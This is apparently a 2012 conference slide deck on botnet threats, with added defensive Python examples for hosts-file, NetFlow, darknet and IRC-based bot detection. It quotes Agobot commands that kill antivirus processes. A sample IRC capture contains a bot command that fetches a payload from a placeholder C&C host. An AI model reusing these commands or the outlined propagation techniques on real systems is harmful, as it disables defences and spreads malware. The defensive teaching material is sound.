The Bot Stops Here:
Removing the BotNet Threat
Eric Vanderburg
JurInnov, Ltd.
April 25, 2012

© 2012 JurInnov Ltd. All Rights Reserved.
Eric Vanderburg, Director of Information Systems and Security at JurInnov, presents "The Bot Stops Here: Removing the BotNet Threat" at the Public and Higher Ed Security Summit.
Presentation Overview
• The Internet is always attacking you, but are you attacking the Internet?
• Botnet overview
• Defining the threat
• Command and Control servers
• Propagation
• Detection
• Prevention
• Response
Botnet Overview
• Bot
– Program that performs automated tasks
– Remote controlled
– AKA: zombie or drone
• Botnet – collection of bots remotely controlled and working together to perform tasks
• Bot herder – bot master
Facts
• 40% of infected machines have 1 or more bots
• Zeus bot is responsible for losses greater than $100 million
Sources: 2011 Damballa threat report; SC Magazine, April 2012
Why are universities particularly susceptible?
• Lack of control over machines
• Silos for research or classroom projects
• A culture of information sharing with minimal boundaries and controls
• Heavy recreational use of network resources including P2P, chat, IRC, games, and social networking
• Ideal target for attackers
– Many hosts
– Large Internet pipe
– Mail and other tempting services
Threat defined – What is done with botnets?
• DDoS
• Spam
• Distribute copyrighted material
– Torrents
• Data mining
• Hacking
• Spread itself
History
Botnet timeline (slide graphic; only the entries and capabilities legible beside each bot are kept):
• 1999 Pretty Park – Used IRC for C&C and updates; harvests email addresses; delivery: email
• 1999 SubSeven – Admin shell access; ICQ notification; delivery: trojan embedded in software
• 2000 GTBot – Used IRC for C&C; DoS; port scan; bounce (relay)
• 2002 SDBot – Keylogger; DDoS
• 2002 AgoBot – Modular design; delivery: WebDAV and MSSQL vulnerabilities, DameWare remote management software, password guessing on common MS ports, and common backdoors
• 2003 SpyBot – Builds on SDBot; keylogger, clipboard logging, webcam capture; delivery: P2P (Kazaa, Grokster, BearShare, Limewire)
• 2003 RBot – Encrypts itself; keylogger, webcam capture; DDoS
• 2004 PolyBot – Builds on AgoBot; polymorphic with encrypted IRC traffic
• 2004 MyDoom – DDoS; own SMTP server; delivery: email
• 2005 MyTob – Keylogger; DDoS; phishing and web form collection; delivery: email
• 2006 Rustock – Spam; encrypts spam in TLS; hides with rootkit techniques
• 2007 Zeus – Phishing with customizable data collection methods; web-based C&C
• 2007 Cutwail – Spam; DDoS
• 2007 Storm – Robust fast-flux C&C DNS network (over 2500 domains); malware re-encoded twice per hour to avoid detection; defends itself with DDoS; delivery: email
• 2008 Mariposa (Butterfly) – Sold and "licensed" to hackers; DDoS, spam, data theft and email harvesting; delivery: MSN, P2P, USB
• 2008 TDSS – Stealthy and difficult to detect; rootkit; sets up a proxy that is rented for anonymous web access; installs pay-per-install malware
• 2009 Koobface – Spam; modifies the hosts file; delivery: social networking
Life Cycle
Stages: Exploit, Rally, Preserve, Inventory, Await instructions, Update, Execute, Report, Clean up
• Exploit
– Malicious code
– Unpatched vulnerabilities
– Trojan
– Password guessing
– Phish
• Rally – reporting in
– Log into the designated IRC channel and PM the master
– Make a connection to an HTTP server
– Post data to an FTP or HTTP form
Life Cycle
• Preserve
– Alter A/V DLLs
– Modify the hosts file to prevent A/V updates
– Remove default shares (IPC$, ADMIN$, C$)
– Rootkit
– Encrypt
– Polymorph
– Retrieve anti-A/V module
– Turn off A/V or firewall services
– Kill A/V, firewall or debugging processes
Agobot host control commands (preserve step):
    <preserve>
      <pctrl.kill "Mcdetect.exe"/>
      <pctrl.kill "avgupsvc.exe"/>
      <pctrl.kill "avgamsvr.exe"/>
      <pctrl.kill "ccapp.exe"/>
    </preserve>
Life Cycle
• Inventory – determine capabilities such as RAM, HDD, processor, bandwidth, and pre-installed tools
• Await instructions from the C&C server
• Update
– Download payload/exploit
– Update C&C lists
Life Cycle
• Execute commands
– DDoS
– Spam
– Harvest emails
– Keylog
– Screen capture
– Webcam stream
– Steal data
• Report back to the C&C server
• Clean up – erase evidence
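The Preserve stage above includes modifying the hosts file so that A/V updates never reach the vendor. That tampering is easy to check for from the defender's side, so the following is an added example (not code from the presentation or from any product it lists): it parses a hosts file and flags entries that sinkhole an external name to loopback or 0.0.0.0, or that override a protected update hostname. The file contents, the vendor hostnames and the protected-host list are all constructed for the example; a real check would carry the update hostnames of the A/V products actually deployed.

```python
import ipaddress

# Constructed sample hosts file for this example (not from the slides). The last
# three entries imitate what a bot's "preserve" step adds to block A/V updates.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.168.1.10    fileserver.corp.example     # legitimate internal override
127.0.0.1       update.example-av.com
0.0.0.0         liveupdate.example-av.com
127.0.0.1       downloads.example-vendor.net
"""

# Names that must never be overridden locally. Assumed list for the example.
PROTECTED_HOSTS = {
    "update.example-av.com",
    "liveupdate.example-av.com",
}

# Names that legitimately map to a loopback address.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost", "ip6-localhost"}


def parse_hosts(text):
    """Return (line_no, address, [hostnames]) for every non-comment hosts entry."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        entries.append((line_no, fields[0], [h.lower() for h in fields[1:]]))
    return entries


def suspicious_entries(text):
    """Flag entries that sinkhole an external name or override a protected update host."""
    findings = []
    for line_no, address, names in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(address)
        except ValueError:
            findings.append((line_no, address, names[0], "unparseable address"))
            continue
        # 127.x / ::1 and 0.0.0.0 are the usual sinkhole targets.
        sinkholed = addr.is_loopback or addr.is_unspecified
        for name in names:
            if name in PROTECTED_HOSTS:
                findings.append((line_no, address, name, "protected update host overridden"))
            elif sinkholed and name not in LOOPBACK_NAMES:
                findings.append((line_no, address, name, "external name sinkholed"))
    return findings


if __name__ == "__main__":
    for line_no, address, name, reason in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {line_no}: {address} {name}: {reason}")
```

Run it against the real file (C:\Windows\System32\drivers\etc\hosts or /etc/hosts) by reading that file into `suspicious_entries`; the legitimate internal override on line 4 is not reported because it points at a routable address.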
Propagation
• Scan for Windows shares and guess passwords ($PRINT, C$, D$, E$, ADMIN$, IPC$)
– Find usernames, then guess passwords from a list
– Remember to use strong passwords
Agobot propagation functions (table from the slide graphic)
Propagation
• Use backdoors from common trojans
• P2P – makes files available with enticing names, hoping they will be downloaded. File names consist of celebrity or model names, games, and popular applications
• Social networking – Facebook posts or messages that provide a link (Koobface worm)
Propagation
• SPIM
– Message the contact list
– Send friend requests to contacts from email lists or IM contacts harvested from the Internet
• Email
– Harvests email addresses from ASCII files such as html, php, asp, txt and csv
– Uses its own SMTP engine and guesses the mail server by putting mx, mail, smtp, mx1, mail1, relay or ns in front of the domain name
Command and Control
• C&C or C2
• Networked with redundancy
• Dynamic DNS with short TTL for the C&C IP (the weakness is the DNS, not the C&C server)
• Daily rotating encrypted C&C hostnames
• Alternate control channels (e.g. researchers in 2004 redirected C&C to a monitoring server)
Command and Control
– Web or FTP server
• Instructions in a file the bots download
• Bots report in, and the hacker uses the connection log to know which ones are live
• Bots tracked in URL data
• Commands sent via push or pull method
– Peer-to-peer – commands can be sent from any peer and peer discovery is possible from any peer, so the network keeps functioning without the C&C server
– Social networking
– Instant messaging
Botnet commands – Agobot
• Commands are sent as PRIVMSG, NOTICE or TOPIC IRC messages
Detecting bots
• Monitor port statistics on network equipment and alert when a machine's utilization exceeds its average
– Gather with SNMP, NetFlow, or first-stage probes (sniffers) attached to mirrored ports on switches
• Wireshark
• Real-time NetFlow analyzer – SolarWinds free NetFlow tool
• Small Operation Center or MRTG – free SNMP/syslog server with dashboard
• SNARE – event log monitoring (Linux and Windows agents)
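The "alert when a machine uses more than average" rule above is simple to implement once flow records are available. The following is an added example (not from the presentation or from any of the tools it names) that takes one interval of constructed NetFlow-style records, computes per-host outbound volume, flags hosts that exceed mean plus two standard deviations of their peers, and separately flags hosts that touch many distinct destinations on one port, which is how a share-scanning bot looks in flow data even though its byte count is small. The 10.0.0.0/8 campus range, the addresses and the byte counts are assumptions.

```python
import ipaddress
from collections import defaultdict
from statistics import mean, pstdev

INTERNAL = ipaddress.ip_network("10.0.0.0/8")  # assumed campus address range

# Constructed flow records (src, dst, dst_port, bytes) standing in for one
# collection interval of nfdump output; not from the slides.
FLOWS = [
    ("10.0.5.11", "93.184.216.34", 443, 100_000),
    ("10.0.5.12", "93.184.216.34", 443, 120_000),
    ("10.0.5.13", "198.51.100.20", 80, 110_000),
    ("10.0.5.14", "198.51.100.20", 80, 130_000),
    ("10.0.5.15", "93.184.216.34", 443, 90_000),
    ("10.0.5.16", "198.51.100.21", 443, 140_000),
    ("10.0.5.17", "198.51.100.21", 443, 105_000),
    ("10.0.5.18", "93.184.216.34", 443, 115_000),
    ("10.0.5.19", "198.51.100.99", 25, 5_000_000),   # sustained SMTP output to one host
    ("203.0.113.8", "10.0.5.11", 443, 80_000),        # inbound flow, ignored below
]
# One host touching sixty neighbours on TCP/445 with tiny flows (share scanning).
FLOWS += [("10.0.5.15", f"10.0.9.{i}", 445, 300) for i in range(1, 61)]


def outbound_bytes(flows):
    """Total bytes sent per internal source address."""
    totals = defaultdict(int)
    for src, _dst, _port, nbytes in flows:
        if ipaddress.ip_address(src) in INTERNAL:
            totals[src] += nbytes
    return dict(totals)


def heavy_talkers(flows, k=2.0):
    """Hosts whose outbound volume exceeds mean + k * stdev of all internal hosts."""
    totals = outbound_bytes(flows)
    if len(totals) < 2:
        return []
    values = list(totals.values())
    threshold = mean(values) + k * pstdev(values)
    return sorted(host for host, total in totals.items() if total > threshold)


def scanners(flows, min_targets=25):
    """Hosts contacting at least min_targets distinct destinations on a single port."""
    targets = defaultdict(set)
    for src, dst, port, _nbytes in flows:
        if ipaddress.ip_address(src) in INTERNAL:
            targets[(src, port)].add(dst)
    return sorted({src for (src, _port), dsts in targets.items() if len(dsts) >= min_targets})


if __name__ == "__main__":
    print("heavy talkers:", heavy_talkers(FLOWS))
    print("scanners:", scanners(FLOWS))
```

In production the baseline should be each host's own history over many intervals rather than its peers in one interval, but the two signals (volume outlier, destination fan-out) are the ones the slide's SNMP and NetFlow sources can supply directly.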
Detecting bots – Stager
• Stager (latest version 4.1)
– Monitors network statistics using NetFlow, based on nfdump
– https://trac.uninett.no/stager
Detecting bots – Firewall
• ASDM – Cisco ASA and PIX
Detecting bots – Darknet
• Network telescope (darknet) – a collector on an unused network address space that monitors whatever it receives but never communicates back
• Most traffic it receives is illegitimate, so it can find random-scanning worms and Internet backscatter (unsolicited commercial or network control messages)
• How to set up a darknet: http://www.team-cymru.org/Services/darknets.html
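Because nothing legitimate is addressed to a darknet, the analysis is mostly classification. This added example (not from the presentation or from Team Cymru's material) takes constructed packet summaries received on an assumed unused 203.0.113.0/24 and separates random-scanning sources (one source sending SYNs to many dark addresses on one port) from backscatter (SYN-ACK or RST replies from a victim whose attacker spoofed our dark addresses). The addresses, flags and counts are all constructed.

```python
import ipaddress
from collections import defaultdict

DARKNET = ipaddress.ip_network("203.0.113.0/24")  # assumed unused, routed but unassigned

# Constructed packet summaries from the collector: (src, dst, proto, tcp_flags, sport, dport).
# tcp_flags is a string such as "S", "SA", "R"; None for non-TCP. Not from the slides.
PACKETS = []
# A source sweeping the dark range on TCP/445 (random-scanning worm behaviour).
PACKETS += [("198.51.100.9", f"203.0.113.{i}", "tcp", "S", 40000 + i, 445) for i in range(1, 41)]
# SYN-ACKs from a web server: backscatter of a SYN flood that spoofed our dark addresses.
PACKETS += [("192.0.2.80", f"203.0.113.{i}", "tcp", "SA", 80, 50000 + i) for i in range(10, 15)]
# A single stray probe, below any scan threshold.
PACKETS += [("198.51.100.50", "203.0.113.77", "tcp", "S", 51234, 22)]
# A packet outside the dark range that the collector should ignore.
PACKETS += [("198.51.100.50", "203.0.114.1", "tcp", "S", 51235, 22)]
# A UDP packet that fits neither category.
PACKETS += [("198.51.100.60", "203.0.113.5", "udp", None, 53, 1900)]

BACKSCATTER_FLAGS = {"SA", "R", "RA"}  # replies a victim sends back to a spoofed SYN


def classify(packets, scan_threshold=20):
    """Split darknet traffic into scanners, backscatter sources and everything else."""
    scan_targets = defaultdict(set)  # (src, dport) -> distinct dark destinations hit
    backscatter = defaultdict(int)
    other = defaultdict(int)
    for src, dst, proto, flags, _sport, dport in packets:
        if ipaddress.ip_address(dst) not in DARKNET:
            continue  # not ours to analyse
        if proto == "tcp" and flags in BACKSCATTER_FLAGS:
            backscatter[src] += 1
        elif proto == "tcp" and flags == "S":
            scan_targets[(src, dport)].add(dst)
        else:
            other[src] += 1
    scanners = {
        src: (dport, len(dsts))
        for (src, dport), dsts in scan_targets.items()
        if len(dsts) >= scan_threshold
    }
    return {"scanners": scanners, "backscatter": dict(backscatter), "other": dict(other)}


if __name__ == "__main__":
    for category, hits in classify(PACKETS).items():
        print(category, hits)
```

A scanner hit on the darknet from one of your own address ranges is the finding the slide is after: an internal host has no reason to probe unused space, so such a source is a strong bot candidate for the response steps later in the deck.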
Detecting C&C
• Ourmon (Linux/FreeBSD tool) – detects network anomalies and correlates them with IRC channel traffic
• Stats generated every 30 seconds
• Application layer analytics
• Claims from ourmon.sourceforge.net/
– Monitor TCP (syndump) and UDP (udpreport) flows
– Log all DNS query responses network wide
– Measure basic network traffic statistically
– Catch "unexpected" mail relays
– Catch botnets
– Spot infections with random "zero-day" malware
– Spot attacks from the inside or outside
– See what protocols are taking up the most bandwidth
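The Ourmon idea above (flow anomalies correlated with IRC channel membership) and the earlier Agobot slide (commands delivered as PRIVMSG, NOTICE or TOPIC messages) can be shown together. This added example, which is not Ourmon's code and not from the presentation, parses IRC lines taken from a constructed capture on a mirrored switch port, builds channel membership per internal client, treats channel text that starts with a bot command prefix as a command, and reports hosts that are both flow anomalies and members of such a channel. The capture contents, channel names, hostnames and the "." / "!" prefixes are assumptions.

```python
import re
from collections import defaultdict

# Minimal RFC 1459 line parser: optional ":prefix", command, middle params, optional ":trailing".
IRC_LINE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?(?P<cmd>[A-Za-z]+|\d{3})"
    r"(?P<params>(?:\s+[^:\s]\S*)*)(?:\s+:(?P<trailing>.*))?$"
)


def parse_irc(line):
    """Return (COMMAND, [params], trailing-or-None), or None if the line is not IRC."""
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    return m.group("cmd").upper(), m.group("params").split(), m.group("trailing")


# Constructed capture: (internal client IP, IRC line seen on the wire). Bot-style traffic
# and a legitimate channel are mixed; none of it is from the slides.
CAPTURE = [
    ("10.0.5.19", "JOIN #b0tz"),
    ("10.0.5.15", "JOIN #b0tz"),
    ("10.0.5.21", "JOIN #b0tz"),
    ("10.0.5.19", ":master!op@c2.example TOPIC #b0tz :.scan.start 445"),
    ("10.0.5.15", ":master!op@c2.example PRIVMSG #b0tz :.update http://c2.example/update.bin"),
    ("10.0.7.4", "JOIN #linux"),
    ("10.0.7.4", ":bob!b@host.example PRIVMSG #linux :anyone tried the new kernel?"),
    ("10.0.7.9", "JOIN #linux"),
]

COMMAND_PREFIXES = (".", "!")  # assumed prefixes for bot commands carried in channel text


def channel_activity(capture):
    """Map channel -> (set of internal members, list of command-looking messages)."""
    members = defaultdict(set)
    commands = defaultdict(list)
    for client, line in capture:
        parsed = parse_irc(line)
        if parsed is None:
            continue
        cmd, params, trailing = parsed
        if cmd == "JOIN" and params:
            for chan in params[0].split(","):
                members[chan].add(client)
        elif cmd in ("PRIVMSG", "NOTICE", "TOPIC") and params and trailing:
            if params[0].startswith("#") and trailing.startswith(COMMAND_PREFIXES):
                commands[params[0]].append(trailing)
    return {chan: (members[chan], commands[chan]) for chan in members}


def suspicious_channels(capture, min_members=3):
    """Channels with several internal members that also carry command-style text."""
    return {
        chan: (mem, cmds)
        for chan, (mem, cmds) in channel_activity(capture).items()
        if len(mem) >= min_members and cmds
    }


def correlate(capture, anomalous_hosts):
    """Hosts that are both flow anomalies and members of a suspicious channel."""
    flagged = set()
    for _chan, (mem, _cmds) in suspicious_channels(capture).items():
        flagged |= mem & set(anomalous_hosts)
    return sorted(flagged)


if __name__ == "__main__":
    print(suspicious_channels(CAPTURE))
    print(correlate(CAPTURE, {"10.0.5.19", "10.0.5.15", "10.0.8.1"}))
```

The `anomalous_hosts` input is whatever the flow-side detector produced (the heavy talkers and scanners from the NetFlow stage); a host appearing in both lists is far stronger evidence than either signal alone, which is the correlation the slide credits Ourmon with.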
Prevention – Vulnerability scanning
• Vulnerability scanning – scan and fix the vulnerabilities found. Identify and protect machines that could be potential bots.
– Nexpose
• Free for up to 32 IPs
– OpenVAS (Vulnerability Assessment System)
• Linux
• VM available (resource intensive)
– Greenbone Desktop Suite (uses OpenVAS)
• Windows XP/Vista/7
– MBSA (Microsoft Baseline Security Analyzer)
– Secunia PSI (local Windows machine scanning only)
Prevention – A/V and Anti-malware
• AVG (Grisoft) – free for home use
• Ad-aware (Lavasoft) – free
• Repelit (itSoftware)
• McAfee
• Microsoft Security Essentials (free for up to 10 PCs)
• Symantec
• Spybot Search and Destroy – free
Prevention
• Personal firewall
• Firewall
– SmoothWall
– M0n0wall
• IPS/IDS
– Snort – network IDS
• BASE – web front-end for Snort
– OSSEC – host IDS
• Web filtering
• Spam filtering (incoming and outgoing)
• Disable VPN split tunnel
Prevention
• Read-only virtual desktops
• Software
– Software restrictions and auditing
– Sandbox software before deployment
• Patch management
• NAC (Network Access Control) – A/V and patches
Response
• Incident response
– Determine scope
– Determine if it constitutes a breach and therefore requires notification
– Analyze – is any evidence needed?
• Toolkit
– Process Monitor
– RootkitRevealer
– Hiren's BootCD 15.1 has a variety of tools (http://www.hiren.info/pages/bootcd)
– Clean the device
Thanks
Enjoy the summit
Acknowledgements:
• Bot command tables obtained from "An Inside Look at Botnets" by Vinod Yegneswaran
• The programs depicted in this presentation are owned by their respective authors